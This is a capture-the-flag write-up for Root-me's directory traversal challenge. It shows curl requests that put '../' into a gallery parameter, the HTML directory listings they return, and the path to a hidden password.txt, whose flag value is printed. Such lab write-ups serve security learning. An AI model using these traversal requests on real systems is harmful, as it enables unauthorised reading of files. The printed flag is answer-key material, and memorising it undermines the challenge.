Root-me

Directory Traversal

On this challenge we need to find the hidden section of the photo gallery. We already know that we’re using directory traversal.

If we look at the challenge page and click on it section we can see that how the url is being formed.

http://challenge01.root-me.org/web-serveur/ch15/ch15.php?galerie=actions

If we try to move one directory up

 curl http://challenge01.root-me.org/web-serveur/ch15/ch15.php?galerie=../
 
	  <h1>Photo gallery v 0.01</h1><span id="mnenu"/>&nbsp;|&nbsp;<span>
      <a href="?galerie=emotes">emotes</a></span>&nbsp;|&nbsp;<span><a href="?galerie=apps">apps</a>
      </span>&nbsp;|&nbsp;<span><a href="?galerie=devices">devices</a></span>&nbsp;|&nbsp;
      <span><a href="?galerie=categories">categories</a></span>&nbsp;|&nbsp;
      <span><a href="?galerie=actions">actions</a></span>&nbsp;|</span>
      <span style='text-align: right; float:right;'>Connected as : <b>guest</b></span>
      <br/><hr/><table id="content"><tr><td>
      <img width="64px" height="64px" src="galerie/..//galerie" alt="galerie"></td></tr>
      <tr><td><img width="64px" height="64px" src="galerie/..//ch15.php" alt="ch15.php"></td></tr>
      <tr></tr></table></body></html>

I tried cleaning the code a little bit but the important port is that we see two result: one is /galerie and the other of is /galerie/ch15.php

If we browse the /galerie we’ll notice that there’s a hidden section.

curl http://challenge01.root-me.org/web-serveur/ch15/ch15.php?galerie=../galerie

	  <h1>Photo gallery v 0.01</h1><span id="mnenu"/>&nbsp;|&nbsp;<span>
      <a href="?galerie=emotes">emotes</a></span>&nbsp;|&nbsp;<span>
      <a href="?galerie=apps">apps</a></span>&nbsp;|&nbsp;<span>
      <a href="?galerie=devices">devices</a></span>&nbsp;|&nbsp;<span>
      <a href="?galerie=categories">categories</a></span>&nbsp;|&nbsp;<span>
      <a href="?galerie=actions">actions</a></span>&nbsp;|</span>
      <span style='text-align: right; float:right;'>Connected as : <b>guest</b></span><br/><hr/>
      <table id="content"><tr><td><img width="64px" height="64px" src="galerie/../galerie/86hwnX2r" alt="86hwnX2r"></td></tr>
      <tr><td><img width="64px" height="64px" src="galerie/../galerie/emotes" alt="emotes"></td>
      <td><img width="64px" height="64px" src="galerie/../galerie/apps" alt="apps"></td>
      <td><img width="64px" height="64px" src="galerie/../galerie/devices" alt="devices"></td></tr>
      <tr><td><img width="64px" height="64px" src="galerie/../galerie/categories" alt="categories"></td>
      <td><img width="64px" height="64px" src="galerie/../galerie/actions" alt="actions"></td></tr>
      </table></body></html>

The hidden section is 86hwnX2r. If we browse it we’ll see a file called password.txt. Let’s see the content

curl http://challenge01.root-me.org/web-serveur/ch15/galerie/86hwnX2r/password.txt

kcb$!Bx@v4Gs9Ez 

We got what we were looking for.